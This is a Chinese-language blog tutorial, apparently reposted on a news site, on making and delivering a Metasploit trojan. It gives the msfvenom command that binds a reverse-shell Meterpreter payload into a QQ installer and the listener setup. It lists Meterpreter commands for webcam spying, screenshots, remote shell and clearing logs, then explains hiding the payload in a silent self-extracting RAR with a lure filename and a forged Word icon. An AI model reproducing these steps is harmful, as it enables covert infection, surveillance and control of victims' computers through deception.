msf之木马程序

news/2024/11/17 0:32:39/

目录

    • 捆绑木马
        • 生成木马文件
          • 附:msfvenom介绍
            • msfvenom简介
            • msfvenom生成
            • exploit/multi/handler模块简介
        • 设置监听反弹
        • 发送木马
          • 查看对方的ip
          • 查看对方目录
          • 截图
          • 开启摄像头
          • 附:Meterpreter常用命令
        • 进一步获取权限
        • 伪装

捆绑木马

这里使用的是Kali linux虚拟机
攻击机ip是192.168.0.108
靶机ip是192.168.177.134

生成木马文件

首先上传一个正常的安装包到kali里面

我这里下了一个QQ
在这里插入图片描述
把它上传到了root/dy/路径下

在这里插入图片描述

然后开始捆绑

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 -f exe -x /root/dy/PCQQ2020.exe -o /root/dy/QQ.exe

-p:指定后面的payload

windows/meterpreter/reverse_tcp:申明这是一个windows系统下的一个反弹tcp

LHOST=192.168.0.108,:设置反弹回来的ip,即你的kali的ip地址

还可以设置返回的端口,这里就不设置了,默认返回端口是4444

-f: 代表要捆绑的文件类型,这里是一个exe文件

-x:指定你要捆绑的文件的路径及文件名,这里我选择的是root/dy/里的PCQQ2020.exe

-o:指定生成的木马文件的路径及文件名,这里我把它保存在原路径里,名字就叫QQ.exe

生成完毕
在这里插入图片描述

附:msfvenom介绍
msfvenom简介

msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,配合meterpreter在本地监听上线。
msfvenom重要参数:(可以使用msfvenom -h查看所有参数)

-p payload设置
-e 编码设置
-a 系统结构,默认x86
-s payload最大大小
-i 编码次数
-f 生成文件格式
msfvenom生成

生成payload,有有两个必须的选项:-p-f
使用-p来指定要使用的payload。

./msfvenom –l payloads      //查看所有msf可用的payload列表

使用-f来指定payload的输出格式

./msfvenom -p windows/meterpreter/bind_tcp -f exe
./msfvenom --help –formats      //查看msf支持的输出格式

一个典型的msfvenom使用举例如下:

$./msfvenom -p windows/meterpreter/reverse_tcplhost=[Attacker IP]lport=4444 -f  exe -o /tmp/my_payload.exe
exploit/multi/handler模块简介
msf>use exploit/multi/handler
#使用exploit/multi/handler监听连入的backdoor
msf exploit(handler)>set payload windows/meterpreter/reverse_http
#设置对应的payload。
Msf exploit(handler)>show options
#显示所有的设置如果需要的话,可能还需要将LHOST,LPORT,设置成与payload中相同的地址和端口。

设置监听反弹

msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.108
set lport 4444
run

在这里插入图片描述

在这里插入图片描述

发送木马

接下来将木马文件发送给目标,至于怎么让目标信任你,安装你发过去的文件。就看你的社工能力了。
作为一个遵守中华人民共和国网络安全法的四有青年,我当然是选择把木马文件发送到另一台windows系统的虚拟机里面。

先将木马文件发到物理机上,然后再从物理机上传到虚拟机上
在这里插入图片描述

在这里插入图片描述

然后双击运行QQ
kali就已经连接到了靶机
在这里插入图片描述

查看对方的ip
ipconfig

在这里插入图片描述

查看对方目录
dir

在这里插入图片描述

截图
screenshot

在这里插入图片描述就会截一张当前靶机的图片,保存的路径会提示出来的
在这里插入图片描述

开启摄像头

因为虚拟机没开摄像头,所以失败
在这里插入图片描述

附:Meterpreter常用命令
info                    #查看已有模块信息
getuid                  #查看权限
getpid                  #获取当前进程的pid
sysinfo                 #查看目标机系统信息
ps                      #查看当前活跃进程
kill <PID>            #杀死进程
reboot / shutdown       #重启/关机shell #进入目标机cmd shell 
webcam_list             #查看摄像头
webcam_snap             #通过摄像头拍照
webcam_stream           #通过摄像头开启视频
execute                 #在目标机中执行文件execute -H -i -f 
cmd.exe                 #创建新进程cmd.exe,-H不可见,-i交互
migrate <pid值>         #将Meterpreter会话移植到指定pid值进程中
clearav                 #清除windows中的应用程序日志、系统日志、安全日志
enumdesktops            #查看可用的桌面
getdesktop              #获取当前meterpreter 关联的桌面
set_desktop             #设置meterpreter关联的桌面 -h查看帮助
screenshot              #截屏
use espia               #或者使用espia模块截屏 然后输入screengrab
run vnc                 #使用vnc远程桌面连接

进一步获取权限

shell

目标主机就是你的了
shell

如果对方就是不下载安装你发的文件怎么办?
RAR有一个自解压的功能
我们可以利用这一点来达到目的
有两个文件,一个是刚刚生成的木马文件,一个是一个txt文档
全部选中,右击添加到压缩文件,注意这里一定要用rar压缩方式

在这里插入图片描述

常规里面

文件名可以是一个诱惑性的,比如学妹联系方式.txt,这里的txt不是文件类型,是文件名的一部分,它的文件类型还是exe
压缩格式RAR,选择创建自解压格式压缩文件

在这里插入图片描述
高级选项中,有个自解压选项在这里插入图片描述
选中它
常规:解压路径随便填一个,这里放在C盘根目录

在这里插入图片描述

设置:解压前运行txt文件,解压后运行QQ.exe文件
在这里插入图片描述

模式:解压时隐藏所有信息

然后确定,确定,再确定

就会解压出一个名为学妹联系方式的文件
在这里插入图片描述将这个文件发出去

同样设置监听反弹,与第一部分一样

msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.108
set lport 4444
run

在这里插入图片描述
当打开这个文档时,显示的是txt文件里的内容,但是QQ.exe也暗中执行了。
当然,实际情况中得换一个轻量级的文件,否则别人看到一个txt文件有80多mb,肯定会怀疑的。

伪装

如何伪装的更像一点呢?
这里以QQ.exe举例

介绍两个工具

BeCyIconGrabber,这个工具可以提取文件图标。
这里提取了一个word文档的图标
在这里插入图片描述

Resource Hacker
这个工具能修改文件图标
将它的图标换成word文档的图标
在这里插入图片描述

这是更改图标后与更改前的区别
在这里插入图片描述
因为需要管理员权限才能执行,所以多了个盾牌的标记。
换成其它的文件就能避免出现此类情况

当然,因为微软默认是隐藏后缀名的,一般情况下非专业人士都不会修改成显示后缀名的。所以一般情况下被攻击者看不到后缀的。如下图:

在这里插入图片描述

但是,万一被攻击者显示后缀名了呢?
在这里插入图片描述
也有办法伪装
把文件名取得长一点,windows就会只显示一部分内容,将后面部分的文件名隐藏。如下:
在这里插入图片描述


http://www.ppmy.cn/news/403014.html

相关文章

什么是蠕虫,木马以及二者跟病毒是什么关系!

参考&#xff1a; 蠕虫与木马之间有什么区别 什么是计算机病毒 我认为&#xff0c;病毒就是形容那些影响正常机体的效能的东西的&#xff01; “计算机病毒&#xff08;Computer Virus&#xff09; 是编制者在计算机程序中插入的破坏计算机功能或者数据的代码&#xff0c;能…

木马 --- 基本概念和分类

木马全称为特洛伊木马&#xff0c;来源于古希腊神话。木马是通过欺骗或诱骗的方式安装&#xff0c;并在用户的计算机中隐藏以实现控制用户计算机的目的。 具有远程控制、信息窃取、破坏等功能的恶意代码 木马具有如下特点&#xff1a; 欺骗性 木马都有很强的欺骗性&#xff0…

病毒,木马,蠕虫的区别

病毒、木马和蠕虫都是计算机病毒&#xff0c;但它们的传播方式、特点和危害程度都有所不同。 病毒&#xff1a;病毒是一种将自己复制到其他计算机程序或文件中的恶意软件。病毒通常依赖于用户行为来传播&#xff0c;比如通过电子邮件、移动存储设备等方式。病毒的具体危害程度…

php 木马,PHP后门木马详解

说起php后门木马我就心有愉季啊前不久一个站就因不小心给人注入了然后写入了小木马这样结果大家知道的我就不说了下面我来给大家收集了各种php后门木马做法大家可参考。 php后门木马对大家来说一点都不陌生吧但是它的种类您又知多少呢 本文为您浅析说明一些php后门木马常用的函…

php 图片木马,php图片木马实现原理

什么是木马 木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码,是具备破坏和删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序。 那,php的木马是长什么样的呢?我们来看下面这段代码:<?php @eval($_GET[tioncico]); 这句话的意思是什么呢?只要在网页…

木马处置建议

1.发现一条远控木马的告警 1.确认时间真实性 2.查询情报信息——时效性、相关的情报信息 3.定位受害ip 4.排除误报 资产&#xff0c;用户触发 5.关联分析——定位被扩散的资产 6.溯源分析 7.提出处置建议出报告 2.远控木马活动事件-传播途径 木马的传播途径 —般中招过程如下…

了解一下木马

木马 木马的分类 木马的特征木马入侵的方式木马的伪装手段制作木马常用工具木马的加壳与脱壳木马脱壳 在Internet中&#xff0c;木马是一类对计算机具有强大的控制和破坏能力&#xff0c;以窃取账号密码和偷窥重要信息为目的的程序。 组成&#xff1a;硬件部分、软件部分和具体…

webshell及木马详解

一、Webshell 1.Webshell基本介绍 webshell&#xff0c;顾名思义&#xff1a;web指的是在web服务器上&#xff0c;而shell是用脚本语言编写的脚本程序&#xff0c;webshell就是就是web的一个管理工具&#xff0c;可以对web服务器进行操作的权限&#xff0c;也叫webadmin。web…